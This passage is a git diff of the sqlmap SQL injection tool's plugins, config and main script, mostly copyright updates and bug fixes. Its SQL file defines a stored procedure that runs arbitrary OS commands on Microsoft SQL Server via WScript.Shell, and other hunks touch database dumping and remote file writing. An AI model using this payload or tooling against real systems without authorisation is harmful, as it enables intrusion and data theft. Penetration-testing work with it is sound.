 See the file 'doc/COPYING' for copying permission
 """
 
@@ -64,7 +64,7 @@ class Fingerprint(GenericFingerprint):
         * http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions
         """
 
-        if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or conf.dbms in SQLITE_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or (conf.dbms or "").lower() in SQLITE_ALIASES):
             setDbms(DBMS.SQLITE)
 
             self.getBanner()
diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py
index f1909779f..53c54f9f6 100644
--- a/plugins/dbms/sqlite/syntax.py
+++ b/plugins/dbms/sqlite/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py
index b9e06ded6..65fe09792 100644
--- a/plugins/dbms/sqlite/takeover.py
+++ b/plugins/dbms/sqlite/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py
index a3f980413..b2df16926 100644
--- a/plugins/dbms/sybase/__init__.py
+++ b/plugins/dbms/sybase/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py
index 56017af6d..3b1c7be75 100644
--- a/plugins/dbms/sybase/connector.py
+++ b/plugins/dbms/sybase/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py
index 9a1da9ae6..09a0356af 100644
--- a/plugins/dbms/sybase/enumeration.py
+++ b/plugins/dbms/sybase/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -10,6 +10,7 @@ from lib.core.common import filterPairValues
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import randomStr
 from lib.core.common import safeSQLIdentificatorNaming
+from lib.core.common import unArrayizeValue
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
 from lib.core.data import kb
@@ -67,6 +68,8 @@ class Enumeration(GenericEnumeration):
             users = kb.data.cachedUsers
 
         for user in users:
+            user = unArrayizeValue(user)
+
             if user is None:
                 continue
 
diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py
index 01a344185..c5dbc6943 100644
--- a/plugins/dbms/sybase/filesystem.py
+++ b/plugins/dbms/sybase/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py
index 19334526a..762ab95eb 100644
--- a/plugins/dbms/sybase/fingerprint.py
+++ b/plugins/dbms/sybase/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -59,7 +59,7 @@ class Fingerprint(GenericFingerprint):
 
     def checkDbms(self):
         if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \
-           or conf.dbms in SYBASE_ALIASES) and Backend.getVersion() and \
+           or (conf.dbms or "").lower() in SYBASE_ALIASES) and Backend.getVersion() and \
            Backend.getVersion().isdigit():
             setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion()))
 
diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py
index 03f0767ed..a0f1775d4 100644
--- a/plugins/dbms/sybase/syntax.py
+++ b/plugins/dbms/sybase/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py
index 0fae2149f..9a9dfd7c4 100644
--- a/plugins/dbms/sybase/takeover.py
+++ b/plugins/dbms/sybase/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/plugins/generic/__init__.py
+++ b/plugins/generic/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py
index c039304f3..7bce4748c 100644
--- a/plugins/generic/connector.py
+++ b/plugins/generic/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py
index 1cb83560a..2871d90c4 100644
--- a/plugins/generic/custom.py
+++ b/plugins/generic/custom.py
@@ -1,20 +1,22 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import re
+import sys
 
 from lib.core.common import Backend
 from lib.core.common import dataToStdout
 from lib.core.common import getSQLSnippet
+from lib.core.common import getUnicode
 from lib.core.common import isStackingAvailable
-from lib.core.convert import utf8decode
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.dicts import SQL_STATEMENTS
+from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.settings import NULL
 from lib.core.settings import PARAMETER_SPLITTING_REGEX
 from lib.core.shell import autoCompletion
@@ -73,14 +75,14 @@ class Custom:
         infoMsg += "'x' or 'q' and press ENTER"
         logger.info(infoMsg)
 
-        autoCompletion(sqlShell=True)
+        autoCompletion(AUTOCOMPLETE_TYPE.SQL)
 
         while True:
             query = None
 
             try:
                 query = raw_input("sql-shell> ")
-                query = utf8decode(query)
+                query = getUnicode(query, encoding=sys.stdin.encoding)
             except KeyboardInterrupt:
                 print
                 errMsg = "user aborted"
diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py
index 7d5151263..195b2d6a7 100644
--- a/plugins/generic/databases.py
+++ b/plugins/generic/databases.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -742,36 +742,40 @@ class Databases:
         infoMsg = "enumerating database management system schema"
         logger.info(infoMsg)
 
-        pushValue(conf.db)
-        pushValue(conf.tbl)
-        pushValue(conf.col)
+        try:
+            pushValue(conf.db)
+            pushValue(conf.tbl)
+            pushValue(conf.col)
 
-        kb.data.cachedTables = {}
-        kb.data.cachedColumns = {}
+            kb.data.cachedTables = {}
+            kb.data.cachedColumns = {}
 
-        self.getTables()
+            self.getTables()
 
-        infoMsg = "fetched tables: "
-        infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \
-                   Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \
-                   else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \
-                   kb.data.cachedTables.items()])
-        logger.info(infoMsg)
+            infoMsg = "fetched tables: "
+            infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \
+                    Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \
+                    else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \
+                    kb.data.cachedTables.items()])
+            logger.info(infoMsg)
 
-        for db, tables in kb.data.cachedTables.items():
-            for tbl in tables:
-                conf.db = db
-                conf.tbl = tbl
+            for db, tables in kb.data.cachedTables.items():
+                for tbl in tables:
+                    conf.db = db
+                    conf.tbl = tbl
 
-                self.getColumns()
-
-        conf.col = popValue()
-        conf.tbl = popValue()
-        conf.db = popValue()
+                    self.getColumns()
+        finally:
+            conf.col = popValue()
+            conf.tbl = popValue()
+            conf.db = popValue()
 
         return kb.data.cachedColumns
 
     def _tableGetCount(self, db, table):
+        if not db or not table:
+            return None
+
         if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
             db = db.upper()
             table = table.upper()
diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py
index 4a5ca7d94..125aa8226 100644
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -147,7 +147,7 @@ class Entries:
                 for column in colList:
                     _ = agent.preprocessField(tbl, column)
                     if _ != column:
-                        colString = re.sub(r"\b%s\b" % column, _, colString)
+                        colString = re.sub(r"\b%s\b" % re.escape(column), _, colString)
 
                 entriesCount = 0
 
@@ -337,12 +337,17 @@ class Entries:
                     kb.data.dumpedTable["__infos__"] = {"count": entriesCount,
                                                         "table": safeSQLIdentificatorNaming(tbl, True),
                                                         "db": safeSQLIdentificatorNaming(conf.db)}
-                    attackDumpedTable()
+                    try:
+                        attackDumpedTable()
+                    except (IOError, OSError), ex:
+                        errMsg = "an error occurred while attacking "
+                        errMsg += "table dump ('%s')" % ex.message
+                        logger.critical(errMsg)
                     conf.dumper.dbTableValues(kb.data.dumpedTable)
 
-            except SqlmapConnectionException, e:
-                errMsg = "connection exception detected in dumping phase: "
-                errMsg += "'%s'" % e
+            except SqlmapConnectionException, ex:
+                errMsg = "connection exception detected in dumping phase "
+                errMsg += "('%s')" % ex.message
                 logger.critical(errMsg)
 
             finally:
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
index a3198cdaa..23826f7e7 100644
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index 9c4a949b9..0aaae5b83 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -1,22 +1,26 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import os
+import sys
 
 from lib.core.agent import agent
 from lib.core.common import dataToOutFile
 from lib.core.common import Backend
+from lib.core.common import checkFile
 from lib.core.common import decloakToTemp
 from lib.core.common import decodeHexValue
+from lib.core.common import getUnicode
 from lib.core.common import isNumPosStrValue
 from lib.core.common import isListLike
 from lib.core.common import isStackingAvailable
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import readInput
+from lib.core.common import unArrayizeValue
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -41,7 +45,7 @@ class Filesystem:
             lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile
 
         elif Backend.isDbms(DBMS.PGSQL) and not fileRead:
-            lengthQuery = "SELECT LENGTH(data) FROM pg_largeobject WHERE loid=%d" % self.oid
+            lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid
 
         elif Backend.isDbms(DBMS.MSSQL):
             self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
@@ -61,18 +65,19 @@ class Filesystem:
 
             if isNumPosStrValue(remoteFileSize):
                 remoteFileSize = long(remoteFileSize)
+                localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding())
                 sameFile = False
 
                 if localFileSize == remoteFileSize:
                     sameFile = True
                     infoMsg = "the local file %s and the remote file " % localFile
-                    infoMsg += "%s have the same size" % remoteFile
+                    infoMsg += "%s have the same size (%db)" % (remoteFile, localFileSize)
                 elif remoteFileSize > localFileSize:
-                    infoMsg = "the remote file %s is larger than " % remoteFile
-                    infoMsg += "the local file %s" % localFile
+                    infoMsg = "the remote file %s is larger (%db) than " % (remoteFile, remoteFileSize)
+                    infoMsg += "the local file %s (%db)" % (localFile, localFileSize)
                 else:
-                    infoMsg = "the remote file %s is smaller than " % remoteFile
-                    infoMsg += "file '%s' (%d bytes)" % (localFile, localFileSize)
+                    infoMsg = "the remote file %s is smaller (%db) than " % (remoteFile, remoteFileSize)
+                    infoMsg += "file %s (%db)" % (localFile, localFileSize)
 
                 logger.info(infoMsg)
             else:
@@ -104,20 +109,27 @@ class Filesystem:
 
         return sqlQueries
 
-    def fileEncode(self, fileName, encoding, single):
+    def fileEncode(self, fileName, encoding, single, chunkSize=256):
         """
         Called by MySQL and PostgreSQL plugins to write a file on the
         back-end DBMS underlying file system
         """
 
-        retVal = []
         with open(fileName, "rb") as f:
-            content = f.read().encode(encoding).replace("\n", "")
+            content = f.read()
+
+        return self.fileContentEncode(content, encoding, single, chunkSize)
+
+    def fileContentEncode(self, content, encoding, single, chunkSize=256):
+        retVal = []
+
+        if encoding:
+            content = content.encode(encoding).replace("\n", "")
 
         if not single:
-            if len(content) > 256:
-                for i in xrange(0, len(content), 256):
-                    _ = content[i:i + 256]
+            if len(content) > chunkSize:
+                for i in xrange(0, len(content), chunkSize):
+                    _ = content[i:i + chunkSize]
 
                     if encoding == "hex":
                         _ = "0x%s" % _
@@ -231,7 +243,7 @@ class Filesystem:
                 fileContent = newFileContent
 
             if fileContent is not None:
-                fileContent = decodeHexValue(fileContent)
+                fileContent = decodeHexValue(fileContent, True)
 
                 if fileContent:
                     localFilePath = dataToOutFile(remoteFile, fileContent)
@@ -256,6 +268,8 @@ class Filesystem:
     def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
         written = False
 
+        checkFile(localFile)
+
         self.checkDbmsOs()
 
         if localFile.endswith('_'):
diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py
index 3cbc11e98..87bfc655c 100644
--- a/plugins/generic/fingerprint.py
+++ b/plugins/generic/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
index f62e17ebf..108c55943 100644
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -162,7 +162,7 @@ class Miscellaneous:
             inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
 
             if Backend.isDbms(DBMS.MSSQL):
-                return
+                udfDict = {"master..new_xp_cmdshell": None}
 
             if udfDict is None:
                 udfDict = self.sysUdfs
diff --git a/plugins/generic/search.py b/plugins/generic/search.py
index f38f7428b..1a4a5b02b 100644
--- a/plugins/generic/search.py
+++ b/plugins/generic/search.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -261,7 +261,7 @@ class Search:
                         if tblConsider == "2":
                             continue
                     else:
-                        for db in conf.db.split(","):
+                        for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),):
                             db = safeSQLIdentificatorNaming(db)
                             if db not in foundTbls:
                                 foundTbls[db] = []
@@ -501,7 +501,7 @@ class Search:
                         if db not in foundCols[column]:
                             foundCols[column][db] = []
                 else:
-                    for db in conf.db.split(","):
+                    for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),):
                         db = safeSQLIdentificatorNaming(db)
                         if db not in foundCols[column]:
                             foundCols[column][db] = []
diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py
index 5a3a77d04..42a67bd9d 100644
--- a/plugins/generic/syntax.py
+++ b/plugins/generic/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
index e4aa96249..d3a782fcb 100644
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/generic/users.py b/plugins/generic/users.py
index 94599c8bb..41081dac1 100644
--- a/plugins/generic/users.py
+++ b/plugins/generic/users.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -101,7 +101,11 @@ class Users:
             values = inject.getValue(query, blind=False, time=False)
 
             if not isNoneValue(values):
-                kb.data.cachedUsers = arrayizeValue(values)
+                kb.data.cachedUsers = []
+                for value in arrayizeValue(values):
+                    value = unArrayizeValue(value)
+                    if not isNoneValue(value):
+                        kb.data.cachedUsers.append(value)
 
         if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct:
             infoMsg = "fetching number of database users"
@@ -420,17 +424,18 @@ class Users:
                             elif Backend.isDbms(DBMS.DB2):
                                 privs = privilege.split(",")
                                 privilege = privs[0]
-                                privs = privs[1]
-                                privs = list(privs.strip())
-                                i = 1
+                                if len(privs) > 1:
+                                    privs = privs[1]
+                                    privs = list(privs.strip())
+                                    i = 1
 
-                                for priv in privs:
-                                    if priv.upper() in ("Y", "G"):
-                                        for position, db2Priv in DB2_PRIVS.items():
-                                            if position == i:
-                                                privilege += ", " + db2Priv
+                                    for priv in privs:
+                                        if priv.upper() in ("Y", "G"):
+                                            for position, db2Priv in DB2_PRIVS.items():
+                                                if position == i:
+                                                    privilege += ", " + db2Priv
 
-                                    i += 1
+                                        i += 1
 
                                 privileges.add(privilege)
 
diff --git a/procs/mssqlserver/create_new_xp_cmdshell.sql b/procs/mssqlserver/create_new_xp_cmdshell.sql
index 913f368c1..005730860 100644
--- a/procs/mssqlserver/create_new_xp_cmdshell.sql
+++ b/procs/mssqlserver/create_new_xp_cmdshell.sql
@@ -1,3 +1,3 @@
 DECLARE @%RANDSTR% nvarchar(999);
-set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
+set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
 EXEC master..sp_executesql @%RANDSTR%
diff --git a/sqlmap.conf b/sqlmap.conf
index f89507c3e..d7db6c376 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -40,31 +40,34 @@ sitemapUrl =
 # These options can be used to specify how to connect to the target URL.
 [Request]
 
+# Force usage of given HTTP method (e.g. PUT).
+method = 
+
 # Data string to be sent through POST.
 data = 
 
-# Character used for splitting parameter values
+# Character used for splitting parameter values.
 paramDel = 
 
 # HTTP Cookie header value.
 cookie = 
 
-# Character used for splitting cookie values
+# Character used for splitting cookie values.
 cookieDel = 
 
-# File containing cookies in Netscape/wget format
+# File containing cookies in Netscape/wget format.
 loadCookies = 
 
-# Ignore Set-Cookie header from response
+# Ignore Set-Cookie header from response.
 # Valid: True or False
 dropSetCookie = False
 
 # HTTP User-Agent header value. Useful to fake the HTTP User-Agent header value
-# at each HTTP request
+# at each HTTP request.
 # sqlmap will also test for SQL injection on the HTTP User-Agent value.
 agent =
 
-# Use randomly selected HTTP User-Agent header value
+# Use randomly selected HTTP User-Agent header value.
 # Valid: True or False
 randomAgent = False
 
@@ -147,17 +150,30 @@ rParam =
 
 # URL address to visit frequently during testing.
 # Example: http://192.168.1.121/index.html
-safUrl = 
+safeUrl = 
+
+# POST data to send to a safe URL.
+# Example: username=admin&password=passw0rd!
+safePost = 
+
+# Load safe HTTP request from a file.
+safeReqFile = 
 
 # Test requests between two visits to a given safe URL (default 0).
 # Valid: integer
 # Default: 0
-saFreq = 0
+safeFreq = 0
 
 # Skip URL encoding of payload data
 # Valid: True or False
 skipUrlEncode = False
 
+# Parameter used to hold anti-CSRF token
+csrfToken = 
+
+# URL address to visit to extract anti-CSRF token
+csrfUrl = 
+
 # Force usage of SSL/HTTPS
 # Valid: True or False
 forceSSL = False
@@ -206,6 +222,10 @@ testParameter =
 # Skip testing for given parameter(s).
 skip =
 
+# Skip testing parameters that not appear dynamic.
+# Valid: True or False
+skipStatic = False
+
 # Force back-end DBMS to this value. If this option is set, the back-end
 # DBMS identification process will be minimized as needed.
 # If not set, sqlmap will detect back-end DBMS automatically by default.
@@ -273,7 +293,7 @@ level = 1
 # Risk of tests to perform.
 # Note: boolean-based blind SQL injection tests with AND are considered
 # risk 1, with OR are considered risk 3.
-# Valid: Integer between 0 and 3
+# Valid: Integer between 1 and 3
 # Default: 1
 risk = 1
 
@@ -638,6 +658,9 @@ charset =
 # Default: 0
 crawlDepth = 0
 
+# Regexp to exclude pages from crawling (e.g. "logout").
+crawlExclude =
+
 # Delimiting character used in CSV output.
 # Default: ,
 csvDel = ,
@@ -692,16 +715,13 @@ updateAll = False
 
 [Miscellaneous]
 
-# Use short mnemonics (e.g. "flu,bat,ban,tec=EU").
-mnemonics =
-
 # Run host OS command(s) when SQL injection is found.
 alert =
 
 # Set question answers (e.g. "quit=N,follow=N").
 answers =
 
-# Make a beep sound when SQL injection is found.
+# Beep on question and/or when SQL injection is found.
 # Valid: True or False
 beep = False
 
@@ -709,10 +729,6 @@ beep = False
 # Valid: True or False
 checkPayload = False
 
-# Heuristically check for WAF/IPS/IDS protection.
-# Valid: True or False
-checkWaf = False
-
 # Clean up the DBMS from sqlmap specific UDF and tables.
 # Valid: True or False
 cleanup = False
@@ -730,7 +746,7 @@ disableColoring = False
 # Default: 1
 googlePage = 1
 
-# Make a through testing for a WAF/IPS/IDS protection.
+# Make a thorough testing for a WAF/IPS/IDS protection.
 # Valid: True or False
 identifyWaf = False
 
@@ -738,11 +754,15 @@ identifyWaf = False
 # Valid: True or False
 mobile = False
 
+# Work in offline mode (only use session data)
+# Valid: True or False
+offline = False
+
 # Display page rank (PR) for Google dork results.
 # Valid: True or False
 pageRank = False
 
-# Conduct through tests only if positive heuristic(s).
+# Conduct thorough tests only if positive heuristic(s).
 # Valid: True or False
 smart = False
 
diff --git a/sqlmap.py b/sqlmap.py
index 5a889d5f9..6bb12a56f 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -9,6 +9,8 @@ import bdb
 import inspect
 import logging
 import os
+import re
+import shutil
 import sys
 import time
 import traceback
@@ -21,9 +23,10 @@ from lib.utils import versioncheck  # this has to be the first non-standard impo
 
 from lib.controller.controller import start
 from lib.core.common import banner
+from lib.core.common import createGithubIssue
 from lib.core.common import dataToStdout
 from lib.core.common import getUnicode
-from lib.core.common import setColor
+from lib.core.common import maskSensitiveData
 from lib.core.common import setPaths
 from lib.core.common import weAreFrozen
 from lib.core.data import cmdLineOptions
@@ -33,6 +36,7 @@ from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.common import unhandledExceptionMessage
 from lib.core.exception import SqlmapBaseException
+from lib.core.exception import SqlmapShellQuitException
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.option import initOptions
@@ -56,7 +60,7 @@ def modulePath():
     except NameError:
         _ = inspect.getsourcefile(modulePath)
 
-    return os.path.dirname(os.path.realpath(getUnicode(_, sys.getfilesystemencoding())))
+    return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding())
 
 def main():
     """
@@ -65,6 +69,15 @@ def main():
 
     try:
         paths.SQLMAP_ROOT_PATH = modulePath()
+
+        try:
+            os.path.isdir(paths.SQLMAP_ROOT_PATH)
+        except UnicodeEncodeError:
+            errMsg = "your system does not properly handle non-ASCII paths. "
+            errMsg += "Please move the sqlmap's directory to the other location"
+            logger.error(errMsg)
+            exit()
+
         setPaths()
 
         # Store original command line options for possible later restoration
@@ -80,6 +93,7 @@ def main():
 
         banner()
 
+        conf.showTime = True
         dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)
         dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True)
 
@@ -101,7 +115,10 @@ def main():
     except (SqlmapSilentQuitException, bdb.BdbQuit):
         pass
 
-    except SqlmapBaseException, ex:
+    except SqlmapShellQuitException:
+        cmdLineOptions.sqlmapShell = False
+
+    except SqlmapBaseException as ex:
         errMsg = getUnicode(ex.message)
         logger.critical(errMsg)
         sys.exit(1)
@@ -122,12 +139,29 @@ def main():
     except:
         print
         errMsg = unhandledExceptionMessage()
+        excMsg = traceback.format_exc()
+
+        for match in re.finditer(r'File "(.+?)", line', excMsg):
+            file_ = match.group(1)
+            file_ = os.path.relpath(file_, os.path.dirname(__file__))
+            file_ = file_.replace("\\", '/')
+            file_ = re.sub(r"\.\./", '/', file_).lstrip('/')
+            excMsg = excMsg.replace(match.group(1), file_)
+
+        errMsg = maskSensitiveData(errMsg)
+        excMsg = maskSensitiveData(excMsg)
+
         logger.critical(errMsg)
         kb.stickyLevel = logging.CRITICAL
-        dataToStdout(setColor(traceback.format_exc()))
+        dataToStdout(excMsg)
+        createGithubIssue(errMsg, excMsg)
 
     finally:
-        dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True)
+        if conf.get("showTime"):
+            dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True)
+
+        if kb.get("tempDir"):
+            shutil.rmtree(kb.tempDir, ignore_errors=True)
 
         kb.threadContinue = False
         kb.threadException = True
@@ -138,12 +172,21 @@ def main():
             except KeyboardInterrupt:
                 pass
 
+        if cmdLineOptions.get("sqlmapShell"):
+            cmdLineOptions.clear()
+            conf.clear()
+            kb.clear()
+            main()
+
         if hasattr(conf, "api"):
             try:
                 conf.database_cursor.disconnect()
             except KeyboardInterrupt:
                 pass
 
+        if conf.get("dumper"):
+            conf.dumper.flush()
+
         # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
         if conf.get("threads", 0) > 1 or conf.get("dnsServer"):
             os._exit(0)
diff --git a/sqlmapapi.py b/sqlmapapi.py
index 089cc80c8..03a2807e7 100755
--- a/sqlmapapi.py
+++ b/sqlmapapi.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
